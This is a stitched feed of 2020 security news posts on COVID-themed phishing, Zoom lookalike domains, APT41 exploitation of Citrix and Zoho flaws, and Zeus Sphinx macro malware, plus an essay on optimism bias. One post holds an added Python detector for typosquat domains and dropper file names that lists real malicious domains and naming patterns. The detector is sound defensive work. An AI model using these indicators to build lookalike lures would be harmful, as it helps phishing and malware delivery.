The post Webinar – Getting Inside the Mind of an Attacker: TLS Attacks and Pitfalls appeared first on Help Net Security.

Distributed disruption: Coronavirus multiplies the risk of severe cyberattacks

The coronavirus pandemic is upending everything we know. As the tally of infected people grows by the hour, global healthcare, economic, political, and social systems are bending and breaking under the strain, and for much of the world there’s no end in sight. But amid this massive wave of disruption, one thing hasn’t changed: the eagerness of cybercriminals to capitalize on society’s misfortune and uncertainty to sabotage, cripple, mislead and steal. New states of emergency … More

The post Distributed disruption: Coronavirus multiplies the risk of severe cyberattacks appeared first on Help Net Security.

Personalized Scams

Cyber criminals now have a wealth of information on almost all of us. With so many organizations hacked nowadays, cyber criminals simply purchase databases with personal information on millions of people, then use that information to customize their attacks, making them far more realistic. Just because an urgent email has your home address, phone number or birth date in it does not mean it is legitimate.

Steering your network in the right direction with segmentation

Throughout history, individuals have taken innovations in their prime and tried to mold them into objects they were never designed to be. An example? The first cars were carriages with engines, the first powered ships were sailing ships with paddles, and so on. That said, history has shown us that there are also many limitations to evolving objects outside of their intended purpose and that these efforts often end in failure. Much like the flying … More

The post Steering your network in the right direction with segmentation appeared first on Help Net Security.

The potential impact of SAP security remediation

More than two thirds (68.8%) of SAP users believe their organizations put insufficient focus on IT security during previous SAP implementations, while 53.4% indicated that it is ‘very common’ for SAP security flaws to be uncovered during the audit process. These are key findings of the SAP Security Research Report by Turnkey Consulting. The research also uncovered that most respondents were not fully equipped to manage risk. A fifth (20.8%) felt most businesses did not … More

The post The potential impact of SAP security remediation appeared first on Help Net Security.

Researchers find shift in monthly web traffic amidst pandemic

There have been shifts in total web traffic broken down by the world’s largest industries as the COVID-19 pandemic has unfolded over the past several weeks, according to Imperva. Based on a weekly average compared to Jan. 19, 2020 traffic, industries that experienced an increase in web traffic from March 1 through March 22, 2020 include: News (+64%), Food and beverages (+34%), Retail (+28%), Gaming (+28%), Law and government (+17%), Education (+17%). Industries that faced … More

The post Researchers find shift in monthly web traffic amidst pandemic appeared first on Help Net Security.

Are You Ready for the Remote Work’s Toll on Corporate Security?

Given the situation that many companies, organizations and government agencies have been forced into working remotely due to COVID-19, it is imperative to give some thought about corporate security. Using a VPN for New Stay-at-Home Workers Millions of employees are now working from the confines of their own homes in an effort to keep businesses […]… Read More

The post Are You Ready for the Remote Work’s Toll on Corporate Security? appeared first on The State of Security.

CI Security Work From Home Security Policy Assessment helps orgs manage risks

CI Security, a Managed Detection and Response (MDR) services provider specializing in defending the networks of organizations and critical infrastructure, announced the addition of a Work From Home Security Policy Assessment to the company’s managed services offering. The Work From Home Security Policy Assessment provides a comprehensive view of the risks faced by an organization and its remote workforce, the capabilities of the organization to implement appropriate and effective security controls, including how to monitor … More

The post CI Security Work From Home Security Policy Assessment helps orgs manage risks appeared first on Help Net Security.

New RiskSense SRS outside-in capabilities extend inside-out risk scoring and prioritization

RiskSense, pioneering risk-based vulnerability management and prioritization, introduced Full Spectrum RBVM (Risk-based Vulnerability Management) that automatically discovers, analyzes, scores, and prioritizes both internal and external-facing security threat exposure across an organization’s IT infrastructure and applications. The cloud-delivered RiskSense solution now combines RBVM with RiskSense SRS (Security Rating Service) to provide 360 degree visibility that eliminates security gaps and enables security teams to measure, prioritize, and control both inside-out and outside-in risks from one integrated console. … More

The post New RiskSense SRS outside-in capabilities extend inside-out risk scoring and prioritization appeared first on Help Net Security.

Candid Wüest joins Acronis as Vice President of Cyber Protection Research

Acronis, a global leader in cyber protection, announced the appointment of Candid Wüest as Vice President of Cyber Protection Research at Acronis. Wüest will lead accelerated research into the latest trends in the threat landscape and new protection methods designed to continuously enhance the world’s most innovative cyber protection solutions. In his role at Acronis, Wüest will be the technical lead for the Acronis Cyber Protection Operation Centers (CPOC) EMEA, defining and leading research projects … More

The post Candid Wüest joins Acronis as Vice President of Cyber Protection Research appeared first on Help Net Security.

COVID-19 relief package provides another platform for bad actors

The ongoing COVID-19 pandemic continues to yield new subject matter that bad actors can turn into fodder for enticing victims into clicking on malicious links and attachments. On March 27, the CARES Act was signed into law by the President, enacting a wide range of stimulus packages designed to aid Americans and businesses during the crisis. One such measure will authorize a supplemental stimulus check to American citizens.

Along with the general increase in coronavirus and COVID-19-themed attacks, this stimulus package will also be leveraged as a lure to deliver additional attacks that trick unsuspecting victims into divulging personal information or subject them to financially motivated exploitation.

Talos has already detected an increase in suspicious stimulus-based domains being registered and we anticipate they will be leveraged to launch malicious campaigns against users.


The post COVID-19 relief package provides another platform for bad actors appeared first on Cisco Blogs.

Crooks leverage Zoom’s popularity in Coronavirus outbreak to serve malware

COVID-19: Hackers Begin Exploiting Zoom’s Overnight Success to Spread Malware

Online communication platforms such as Zoom are essential instruments at the time of Coronavirus outbreak, and crooks are attempting to exploit their popularity.

The Coronavirus outbreak is changing our habits and crooks are attempting to take advantage of the popularity of online communication platforms such as Zoom that are used by businesses, school classrooms and normal users.

Zoom has over 74,000 customers and 13 million monthly active users; its popularity exploded with the COVID-19 outbreak because the platform is used by millions of students and by government and private-sector employees.

According to a report published by Check Point, experts observed a significant increase in the number of registrations for new fake “Zoom” domains and in malicious “Zoom” executable files, both evidence of malicious campaigns in progress.

“During the past few weeks, we have witnessed a major increase in new domain registrations with names including “Zoom”, which is one of the most common video communication platforms used around the world.” reads the analysis published by CheckPoint.

“Since the beginning of the year, more than 1700 new domains were registered and 25% of them were registered in the past week. Out of these registered domains, 4% have been found to contain suspicious characteristics.”

Check Point researchers observed over 1,700 new “Zoom” domains that have been registered since the beginning of the Coronavirus outbreak, with 25 percent of them registered in the last week.

Experts have also detected malicious files with names such as “zoom-us-zoom_##########.exe” and “Microsoft-teams_V#mu#D_##########.exe” (# representing various digits). These files act as droppers for the InstallCore PUA and could potentially deliver other malicious payloads.

Check Point pointed out that crooks are also targeting other applications widely adopted during this period due to the Coronavirus epidemic, such as Google Classroom.

Threat actors registered malicious domains like googloclassroom[.]com and googieclassroom[.]com to deliver malware.
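The lookalike-domain and dropper file-name observations above translate naturally into a small triage check that a defender can run over newly registered domains or proxy logs. The following Python is an added example, not code from Check Point or from the article; the allowlist of genuine hosts, the homoglyph table, the edit-distance thresholds and the reading of each “#” as a single decimal digit are my assumptions, and the sample domains are constructed apart from the two quoted in the text.

```python
"""Heuristic triage for lookalike domains and dropper file names of the kind
Check Point reported in the Zoom / Google Classroom campaigns (added example)."""
import re

# Assumption: these are the genuine hosts; anything else imitating the brands is suspect.
LEGIT_DOMAINS = {"zoom.us", "zoom.com", "classroom.google.com", "teams.microsoft.com"}

# Brand labels that lookalike registrations imitate (compared after normalisation).
BRAND_LABELS = ("zoom", "googleclassroom", "microsoftteams")

# Common visual substitutions, applied to both candidate and brand before comparing.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("i", "l"), ("|", "l")]

# File-name patterns quoted in the report, each '#' read as one digit (assumption).
DROPPER_NAME_PATTERNS = [
    re.compile(r"^zoom-us-zoom_\d{10}\.exe$", re.IGNORECASE),
    re.compile(r"^Microsoft-teams_V\dmu\dD_\d{10}\.exe$", re.IGNORECASE),
]


def refang(domain: str) -> str:
    """Turn a defanged indicator such as googieclassroom[.]com back into a hostname."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".").rstrip(".")


def normalise(label: str) -> str:
    """Collapse homoglyph pairs so 'googie' and 'google' compare equal."""
    label = label.lower()
    for src, dst in HOMOGLYPHS:
        label = label.replace(src, dst)
    return label


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (insert / delete / substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_domain(domain: str):
    """Return None for an allowlisted or unrelated domain, else a short reason string."""
    host = refang(domain)
    if host in LEGIT_DOMAINS or any(host.endswith("." + d) for d in LEGIT_DOMAINS):
        return None
    labels = host.split(".")
    # Drop the TLD and punctuation so 'zoom-us-download.xyz' becomes 'zoomusdownload'.
    core = re.sub(r"[^a-z0-9]", "", "".join(labels[:-1]))
    if not core:
        return None
    norm = normalise(core)
    for brand in BRAND_LABELS:
        nb = normalise(brand)
        if norm == nb:
            return f"homoglyph of {brand}"
        # Short brands ('zoom') only get the containment check; an edit-distance
        # match on a four-letter word would flag 'zoo' or 'boom' as typosquats.
        limit = 0 if len(nb) < 6 else (1 if len(nb) < 10 else 2)
        if limit and edit_distance(norm, nb) <= limit:
            return f"typosquat of {brand}"
        if nb in norm:
            return f"contains brand token {brand}"
    return None


def is_dropper_name(filename: str) -> bool:
    """True when a file name matches one of the reported dropper naming patterns."""
    return any(p.match(filename.strip()) for p in DROPPER_NAME_PATTERNS)


def scan(domains):
    """Map each candidate domain to its verdict (None = nothing suspicious)."""
    return {d: classify_domain(d) for d in domains}


# Constructed sample: two indicators from the article plus invented benign/malicious names.
SAMPLE_DOMAINS = [
    "zoom.us", "classroom.google.com", "googloclassroom[.]com",
    "googieclassroom[.]com", "zoom-us-download.xyz", "zoo.com", "bloomfield.org",
]

if __name__ == "__main__":
    for dom, verdict in scan(SAMPLE_DOMAINS).items():
        print(f"{dom:28} -> {verdict or 'ok'}")
    for name in ("zoom-us-zoom_1234567890.exe", "ZoomInstaller.exe"):
        print(f"{name:40} dropper pattern: {is_dropper_name(name)}")
```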

Below are the recommendations published by Check Point:

  1. Be cautious with emails and files received from unknown senders, especially if they are offering special deals or discounts.
  2. Don’t open unknown attachments or click on links within the emails.
  3. Beware of lookalike domains, spelling errors in emails and websites, and unfamiliar email senders.
  4. Ensure you are ordering goods from an authentic source. One way to do this is NOT to click on promotional links in emails, and instead, Google your desired retailer and click the link from the Google results page.
  5. Prevent zero-day attacks with a holistic, end to end cyber architecture.

Pierluigi Paganini

(SecurityAffairs – coronavirus, hacking)

The post Crooks leverage Zoom’s popularity in Coronavirus outbreak to serve malware appeared first on Security Affairs.

COVID-19 and the Human Side of Cybersecurity Leadership

Microsoft's Diana Kelley on Ensuring Care for the People Behind Those Processes and Technologies
When securing the remote workforce, it's important to be mindful of the human challenges - educating children, caring for elders and dealing with the barrage of COVID-19 news, says Microsoft's Diana Kelley, who shares insights on balancing cybersecurity and compassion.

FBI: Cybercrime Gang Mailing ‘BadUSB’ Devices to Targets

Malicious USB Devices Accompanied by Fake Gift Cards to Entice Would-Be Victims
The FBI warns that the notorious FIN7 cybercrime gang has a new trick up its sleeve: Mailing victims a $50 gift card portrayed as good for redeeming items listed on an accompanying USB storage device, which in reality downloads Griffon backdoor software to give attackers remote access.

Annual Protest to ‘Fight Krebs’ Raises €150K+

In 2018, KrebsOnSecurity unmasked the creators of Coinhive — a now-defunct cryptocurrency mining service that was being massively abused by cybercriminals — as the administrators of a popular German language image-hosting forum. In protest of that story, forum members donated hundreds of thousands of euros to nonprofits that combat cancer (Krebs means “cancer” in German). This week, the forum is celebrating its third annual observance of that protest to “fight Krebs,” albeit with a Coronavirus twist.

Images posted to the decidedly not-safe-for-work German-language image forum pr0gramm[.]com. Members have posted a large number of ‘thank you’ receipts from cancer research organizations that benefited from their fight cancer/krebs campaign.

On March 26, 2018, KrebsOnSecurity published Who and What is Coinhive, which showed the founder of Coinhive was the co-creator of the German forum pr0gramm[dot]com (not safe for work). I undertook the research because Coinhive’s code at the time was found on tens of thousands of hacked Web sites, and Coinhive seemed uninterested in curbing widespread abuse of its platform.

Pr0gramm’s top members accused KrebsOnSecurity of violating their privacy, even though all of the research published about them was publicly available online. In protest, the forum’s leaders urged members to donate money to medical research in a bid to find a cure for Krebs (i.e. “cancer”). They ended up raising more than a quarter-million dollars worth of donations from members.

Last year’s commemoration of the protest fundraiser — dubbed “Krebsaction” by Pr0gramm — raised almost $300,000 for anti-cancer research groups. Interestingly, Coinhive announced it was shutting down around the same time as that second annual fundraiser.

This year’s Krebsaction started roughly three days ago and so far has raised more than 150,000 euros (~$165,000), with many Pr0gramm members posting screenshots of their online donations. The primary beneficiary appears to be DKMS, a German nonprofit that works to combat various blood cancers, such as leukemia and lymphoma.

The pr0gramm post kicking off this year’s “Krebsaction” fundraiser.

This year, however, Pr0gramm’s administrators exhorted forum members to go beyond just merely donating money to a worthy cause, and encouraged them to do something to help those most affected by the COVID-19/Coronavirus pandemic.

“This year pr0gramm-members shall not only donate but do a good act in terms of corona (and prove it), for example bring food to old people, bring proof of volunteering and such stuff,” reads the Pr0gramm image kicking off this year’s Krebsaction.  The message further states, “Posts mit geringem Einsatz können wir nicht akzeptieren,” which translates roughly to “Posts with little effort we cannot accept.”

Financial Sector Cybersecurity Framework Profile Consolidates Regulatory Requirements

Cyberattacks are an all too common occurrence, especially for financial institutions. In response, we are seeing an influx of security rules and regulations for financial institutions to follow. And, although the regulations are beneficial, complying with the regulations can be time consuming and costly.

According to findings from the technology division of the Banking Policy Institute (BITS), “One firm’s Chief Information Security Officer estimated that 40 percent of his time and that of his team was devoted to reconciling various requirements of regulatory agencies.” And a report from Boston Consulting Group (BCG) cited that a multinational bank was spending more than 15 percent of its annual operating budget on risk and compliance.

In an effort to mitigate the time and financial constraints, BCG, BITS, and more than 150 financial services institutions came together to develop the Financial Sector Cybersecurity Framework Profile. The profile consolidates regulatory requirements, making it easier to comply with multiple requirements. This is a major win for financial services institutions because, according to industry data collected by BITS, over 30 cybersecurity regulations have been released in the past five years, with plans to issue more.

With the profile now in place, financial services institutions don’t have to answer a separate set of reporting questions to prove compliance with every rule and regulation. There is now one framework that encompasses all of the rules and regulations with a consolidated set of questions. According to BCG, having one common framework has reduced the number of questions by 49 percent for large organizations and 73 percent for small ones.

Aside from the decrease in compliance questions, the time and money saved from the profile helps financial institutions focus on the main aspects of their cybersecurity program, innovation, and, most importantly, their clients.

The response from the new profile has been overwhelmingly positive. As Paul Farrington, EMEA Chief Technology Officer at Veracode stated:

“Financial services firms have to deal with a myriad of regulations, especially relating to cybersecurity. We need organisations to be held accountable for improving their security posture. Standards are vital, but reporting can be a real burden and, in some cases, gets in the way of doing valuable security work. We welcome the Financial Sector Cybersecurity Framework Profile. It should help teams fast-track compliance exercises and create capacity for additional security focus.”

Any financial institution, regardless of size, can leverage the profile. It encompasses more than 30 US federal, state, and global regulations, including the NIST Cybersecurity Framework, The International Organization for Standardization (ISO)/International Electrotechnical Commission (IEC) 27001, and The Committee on Payments and Market Infrastructures (CPMI)-International Organization of Securities. The profile should address up to 90 percent of regulatory requirements at one time, enabling companies to focus on threats. The hope is for the profile to incorporate more global regulations in the coming years.

For additional information on the new profile, please read the Financial Sector Cybersecurity Framework Profile user guide.

Ban Hasn’t Stopped COVID-19 Instagram Ads

Adverts and listings that capitalize on the COVID-19 outbreak are appearing on Instagram and Facebook despite being banned.

On March 6, Facebook and Instagram announced a temporary ban on ads and listings selling medical face masks on its marketplace. On March 19, Rob Leathern, head of trust and integrity for Facebook ads and business platform, extended the ban to include hand sanitizers, coronavirus testing kits, disinfecting wipes, and several other products.

Tenable's Satnam Narang has observed a growing number of adverts for COVID-19 essentials since the ban was issued.

"Despite the ban, advertisements continue to appear on Facebook and Instagram, some as recently as March 26," said Narang. 

"I began observing an uptick in activity in my Instagram Feed on Friday, March 20. All of a sudden, every single sponsored post in my Instagram Feed had something to do with masks, whether it be N95 masks, surgical masks or face shields."

Advertisers have carefully moderated the language they use in their ads in a slippery attempt to get around the ban.

"Many of the advertisements don’t overtly reference COVID-19 or the novel coronavirus that causes it in their posts," said Narang. "They do, however, talk about protecting oneself from 'harmful particles' and how to 'stay protected at all times' while referencing N95 masks or harmful viruses and bacteria, implying a connection to COVID-19."

Narang observed carefully worded ads appearing in his Instagram feed and showing up in his Instagram stories. Some were native to Instagram, but others originated from Facebook advertisers, including duamaskcom and Plengoods.

Alongside Facebook pages and Instagram accounts created recently for the sole purpose of promoting COVID-19-related items like N95 masks, Narang observed opportunists compromising the accounts of existing pages in order to advertise their products. 

"The Facebook Page for a Greek restaurant in Zimbabwe was compromised and used to push an advertisement for surgical masks to Instagram. The page does not appear to have been maintained since 2008," said Narang. 

But the crappy behavior of the few has not caused Narang to lose his faith in humanity. 

He told Infosecurity Magazine: "It’s certainly disheartening to see opportunists trying to profit from this crisis, but I’ve definitely seen a lot of kindness that gives me hope: People within communities volunteering to pick up groceries for the elderly, high-risk individuals creating blueprints to 3D print masks and other personal protective equipment, folks brokering deals to secure N95 masks for frontline workers, and retired medical professionals coming out of retirement to help out on the front line."

Narang urged users of these platforms to "help by reporting these ads using the built-in reporting functionality on social media services."

The new digital world and the Holodeck

The COVID-19 pandemic has challenged businesses to evolve their digital selves in new ways. An important lesson from 2020 is that every business must be digital. But we face real challenges before we reach digital utopia. John Kao, a world-renowned innovation and leadership expert, shares his views on the future of work and leadership as a result of the COVID-19 pandemic.

VoIP Carriers Investigated Over Fraudulent Robocalls

An American court has ordered injunctions against two telecom carriers that facilitated hundreds of millions of fraudulent robocalls to consumers in the United States.

The scam calls predominantly targeted elderly and vulnerable people, successfully conning victims out of personal information, money, and property. Many of the robocalls were made by fraudsters overseas impersonating government agencies and conveying alarming messages.

Victims were tricked into thinking that their assets were being frozen, their personal information had been compromised, or their benefits were about to be stopped. 

In some calls, fraudsters impersonated employees at legitimate businesses, including Microsoft. 

The injunctions, which relate to two separate civil actions, are the first of their kind to be obtained by the United States Justice Department. Both orders were issued by the US District Court for the Eastern District of New York, and both civil actions are pending.

The first injunction bars husband and wife Nicholas and Natasha Palumbo and two entities from operating as intermediate voice-over-internet-protocol (VoIP) carriers. 

The Palumbos, of Scottsdale, Arizona, own and operate Ecommerce National LLC and SIP Retail, which do business as TollFreeDeals.com and sipretail.com, respectively. The couple are currently being investigated for what the District Court described as “widespread patterns of telecommunications fraud, intended to deprive call recipients in the Eastern District of New York and elsewhere of money and property.”

The court noted that though the Palumbos had been warned more than 100 times of specific instances of fraudulent calls being transmitted through their network, they never severed their business relationship with any entity they learned was associated with fraudulent call traffic.

In the second matter, the court entered consent decrees that permanently bar New York resident John Kahen, aka Jon Kaen, and three entities—Global Voicecom Inc, Global Telecommunication Services Inc., and KAT Telecom Inc.—from operating as intermediate VoIP carriers conveying any telephone calls into the US telephone system.

“These massive robocall fraud schemes target telephones of residents across our country, many of whom are elderly or are otherwise potentially vulnerable to such schemes,” said Assistant Attorney General Jody Hunt of the Department of Justice’s Civil Division.

Chinese-based threat actor acts fast when vulnerabilities are found, warns FireEye

The recent attempt by a Chinese-based threat actor to exploit vulnerabilities in enterprise products from Citrix, Cisco Systems and Zoho is a good example of why patches have to be tested and installed as soon as possible, a new report from FireEye suggests.

The report issued last week focuses on a group dubbed APT41, which between Jan. 20 and March 11 attempted to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers in countries including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, the UAE, the U.K. and the United States.

The campaign started 10 days after Citrix publicly revealed a vulnerability (CVE-2019-19781) had been found in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, and Citrix SD-WAN WANOP appliance. The bug could allow an unauthenticated attacker to perform arbitrary code execution.

“This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage,” says the report.


Citrix released a mitigation patch for CVE-2019-19781 on December 17, 2019. As of Jan. 24, it had released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP. While APT41 had been looking for devices to exploit before then, its real exploitation activity started February 1, suggesting that network admins who had applied the fixes would have been protected.

The report says on Feb. 21 a Cisco Small Business RV320 router at an unnamed telecommunications company was exploited by the gang and a file was downloaded. It isn’t known what exploit was used.

Then on March 8, APT41 attempted to exploit a vulnerability announced three days earlier (CVE-2020-10189) in some versions of Zoho ManageEngine Desktop Central at more than a dozen FireEye customers. Five of those were actually hacked.

FireEye says it’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target. However, because the initial knocking on doors was only against Citrix devices, it suggests APT41 had an already-known list of identified devices accessible on the internet.

FireEye believes the group has the backing of China and is known for conducting espionage for the government as well as financially motivated activity for itself.

The report notes the recent exploit attempts try to install publicly available backdoors such as Cobalt Strike and Meterpreter. “In previous incidents, APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks.”

Zeus Sphinx spam campaign attempts to exploit Coronavirus outbreak

The Zeus Sphinx malware is back, operators are now spreading it exploiting the interest in the Coronavirus outbreak.

The Zeus Sphinx malware is back, it was observed in a new wave of attacks attempting to exploit the interest in the Coronavirus outbreak.

Experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware, also known as Zloader or Terdot, that focuses on government relief payments.

The Zeus Sphinx malware was first observed in August 2015, a few days after a new variant of the popular Zeus banking trojan was offered for sale on hacker forums.

Now the Zeus Sphinx malware is back, operators are spreading it in a spam campaign aimed at stealing victims’ financial information.

Spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments.

“Current malspam campaigns feature booby-trapped document files named “COVID 19 relief” and subject lines relying on the same theme. Sphinx’s targets have not changed from its past configuration files as it continues to focus on banks in the US, Canada, and Australia.” reads the analysis published by IBM X-Force.

The Zeus Sphinx variant used in the recent Coronavirus-themed campaign is only slightly different than the original. 

Spam emails include a form, in MS Word format, that supposedly must be filled out to receive funds meant to help people who are now at home due to the COVID-19 pandemic. The document is password-protected, likely to prevent analysis before it reaches the potential victim; the password is included in the body of the email.

Once opened, the document displays a message instructing victims to enable macros to view the content; unfortunately, doing so starts the infection process.

“Once the end user accepts and enables these malicious macros, the script will start its deployment, often using legitimate, hijacked Windows processes that will fetch a malware downloader.” continues the post. “Next, the downloader will communicate with a remote command-and-control (C&C) server and fetch the relevant malware — in this case, the new Sphinx variant.”

Zeus Sphinx gains persistence by dynamically writing itself to numerous files and folders, and it also creates registry keys for the same purpose.

When injecting into browser processes, Sphinx signs the malicious code with a digital certificate, a common evasion technique.

Experts observed that the web injections are in some cases still based on the Zeus v2 codebase. Zeus Sphinx patches processes associated with Explorer and common browsers, including Chrome and Mozilla Firefox. In this way, the malicious code is triggered when a user visits a target page, such as an online banking platform.

“As a modular banking Trojan that’s based on the dated Zeus v2 code, Sphinx’s core capability is to collect online account credentials from banks and a wide range of other websites.” continues the post. “It calls on its C&C server to fetch relevant web injections when infected users land on a targeted page and uses them to modify the pages users are browsing to include social engineering content and trick them into divulging personal information and authentication codes.”

Experts pointed out that if a browser pushes an update, the web injection function will likely not “survive.”

The report published by IBM X-Force also provided technical details about the threat, including IoCs.

Unfortunately, the number of COVID-19-themed attacks continues to increase; if you are interested in information about the attacks observed over the last week, take a look at:

Pierluigi Paganini

(SecurityAffairs – Zeus Sphinx Trojan, Coronavirus)

The post Zeus Sphinx spam campaign attempt to exploit Coronavirus outbreak appeared first on Security Affairs.

Covid-19 Crisis: How to Manage VPNs

Practitioners Share Insights on How They're Addressing VPN Shortcomings
Security practitioners around the world are struggling to cope with the challenges posed by remote workers heavily relying on virtual private networks during the Covid-19 pandemic. Here's a look at steps to take to help enhance security.

Decision Making Before and During Times of Crisis: A Parallel Between Cybersecurity Incidents and the Current COVID-19 Pandemic

The coronavirus pandemic is not only the first time in history when a biological virus also affects the cybersecurity industry (through phishing attacks and COVID-19-themed malware) but the way the breakout has been handled so far also resembles the way certain IT decision-makers may react when it comes to dealing with security issues.

Until now, the crisis has been approached from different angles by governments around the world. The pandemic is now causing major disruptions in the way we live and work, and perhaps, irreversibly. It is an unprecedented health and economic disaster, which puts our collective ability to respond to the test.

How prepared are governments when disaster strikes? How about us as citizens? Why don’t we all focus on prevention rather than on dealing with the consequences?

A comparison between decision making in Cybersecurity and the COVID-19 pandemic

If you think about it, in many cases, cyber-attacks and malware behave and spread in ways similar to a pandemic. Some digital threats are even called “viruses”, after all.

But how are decisions taken during the current pandemic versus before and during a cybersecurity crisis?

Without the intention of trying to oversimplify the complexity and severity of the COVID-19 pandemic, I’ve discovered some similarities that I would like to point out.

#1. Inaction fueled by optimism bias

Even though we like to think of ourselves as rational creatures, it’s in human nature to disregard risk associated with – well, anything…

Why? The optimism bias phenomenon is to be blamed. In short, it refers to the belief that we have lower chances of being affected by negative events than other people and that we are more likely to experience positive events than our peers.

The term was coined by Neil D. Weinstein in 1980, who through his experiment discovered that most college students thought their chances of developing a drinking problem or getting divorced were lower than that of their colleagues. Simultaneously, the majority of these students also believed that their chances of positive things happening to them (such as owning a house and growing old) were much higher.

In a recent article, Marie Helweg-Larsen, Professor of Psychology, argues that certain people are refusing to change their behavior during the current coronavirus pandemic due to optimism bias. For instance, if you don’t believe chances are you may be infected, you might think that interacting with your grandmother won’t be harmful. This way, due to the infection’s uncertainty, you tend to minimize risk.

The perception around risk can be difficult to change. But since social distancing and staying at home are now typically considered the moral thing to do, people may be more likely to change their attitude when thinking about keeping others safe (and not themselves, in particular). So, no longer focusing on your own personal risk may fuel a more protective behavior.

Obviously, regular citizens are not the only ones who have fallen under the optimism bias since the COVID-19 pandemic emerged. In the same manner, leaders around the world have been crippled by inertia and have tended to underestimate the critical impact the novel coronavirus would have on their countries, healthcare systems, and economies.

How common is optimism bias in cybersecurity?

Of course, optimism bias can also be observed in the cybersecurity field. In short, this phenomenon prevents some security leaders from taking preventative measures and therefore hinders companies from achieving a good security posture.

The results of a study revealed that security executives are indeed affected by optimism bias. The report shows they believed their risk to be substantially lower than that of the companies they were compared with. Furthermore, they seemed to be aware of the existing risks, yet still could not completely grasp the magnitude of the potential consequences.

The same study has shown that subjects, at the very least, acknowledged their interconnectedness with their business partners. Even though they considered themselves to be less prone to risk than other companies, they seemed to perfectly understand that they could themselves become victims due to other parties they have partnered up with. These dangers are nowadays commonly referred to as Supply Chain Attacks or Vendor Email Compromise (VEC) threats.

How to avoid bias when building your cybersecurity strategy

Biases impact decision-making processes and obviously, the cybersecurity industry is no exception to the rule.

So, how can you, as an IT decision-maker, avoid being under the influence of cognitive biases?

Here are a few points to consider:

  • Becoming aware of optimism bias and accepting that the phenomenon is an inherent part of us as humans. This is the first step toward taking impartial, unbiased decisions.
  • Looking at real-life examples. Understanding how organizations that match your own profile were impacted by cyberattacks and analyzing how your company would react when faced with a similar scenario. Would it be prepared to deal with an attack or miserably fail? How cyber resilient is your organization?
  • Thinking about the overall positive impact of a strong cybersecurity strategy on your business. Organizations should not simply be applying scare tactics to themselves; they should start realizing how threat prevention and mitigation will keep their company up and running.

#2. Testing and micro-segmentation

So far, countries that have proved to be the most successful in managing COVID-19 infections behaved the same way cyber resilient organizations do. And the ones that failed to keep the epidemic under control did not have all the prevention and mitigation measures in place.

For instance, as the epidemic was (not so) slowly increasing, Britons were encouraged to “keep calm and carry on” and let the herd immunity strategy, which was heavily criticized in the end, do the trick. Prime Minister Boris Johnson later admitted that Britain was going through the “greatest public health crisis for a generation” and started implementing some forms of social distancing measures.

After the first American case was announced in late January, when asked whether he believed this would turn into a pandemic, President Donald Trump’s response was “No. Not at all. And we have it totally under control. It’s one person coming in from China, and we have it under control. It’s going to be just fine.”

In early March, Trump was still suggesting that the virus was “less serious than the flu” and reassuring people that “It will go away. Just stay calm. It will go away.” Meanwhile, the U.S. was falling behind on testing and some Trump administration officials were responding with untruths, suggesting that anyone who wanted could get tested when in reality, there was a shortage of testing kits. As of March 30, 2020, the U.S. has the most confirmed COVID-19 cases in the world, surpassing China, Italy, and Spain.

In the meantime, South Korea, Singapore, and Taiwan have managed to contain the outbreak due to diligent testing and social distancing measures.

Below you can see the number of Tests conducted vs. Total confirmed cases in different countries around the world:

Along the same lines, the same testing (or monitoring) practices should be followed in cybersecurity.

Should threats remain hidden inside your organization, there will be room for lateral movement and future exploitation. However, the spread of malware infections can be stopped if you put a segmented architecture based on zero trust in place. The model is based on the belief that one should never trust anything inside an organization by default and should always verify everything in the first place. Zero trust networks are based upon micro-segmentation, which divides perimeters into small areas so that certain parts of your network remain isolated and have separate access. In case a data breach occurs, micro-segmentation limits further exploitation of your network.

What’s more, simply because people aren’t displaying any visible symptoms of COVID-19, that doesn’t necessarily mean they are not infected and therefore shouldn’t get tested. There have been cases of coronavirus false-negatives so far, which leaves experts worried about this type of inaccuracy amidst the outbreak.

However, even though universal testing during the pandemic may sound utopian due to logistical constraints and the shortage of testing kits, the same should not apply when it comes to your organization’s security.

Most nations that have had a hard time enforcing social isolation rules have witnessed COVID-19 infections growing quicker. Italy, for instance, around a week ago, when around 41,000 people were infected and the outbreak was already out of control, was charging 50,000 individuals for breaking isolation laws. Fast forward another week later, the cases in Italy had almost doubled.

On the other hand, after imposing draconian lockdown measures and despite being the outbreak’s original source, China managed to flatten the coronavirus curve. They tried to proactively find infections rather than just passively wait for symptoms to develop. As you may already know, this approach is also considered a best practice in cybersecurity.

What’s more, a study has shown that as human mobility decreased in China after social distancing measures were put in place, so did new infections.

Image source: “The effect of human mobility and control measures on the COVID-19 epidemic in China”, available here

As you can see in Graph a, human mobility dropped after January 23, 2020, when the cordon sanitaire (the health measures aimed at controlling the spread of the disease) was put in place for Wuhan, and was considerably lower than in January 2019. After this date, the number of coronavirus cases and the infection rate also started decreasing, as you can see in the charts below:

Image source: “The effect of human mobility and control measures on the COVID-19 epidemic in China”, available here

#3. Improving your defenses and mitigating risk

During this critical period, hospitals and governments had to beef up their defenses against COVID-19. Basically, more medical supplies than ever, like gloves, gowns, or ventilators, now have to be purchased. Needless to say, having the right amount of protective equipment is vital. Unfortunately, however, many countries were unprepared, even though they should have been able to see a disaster like this coming.

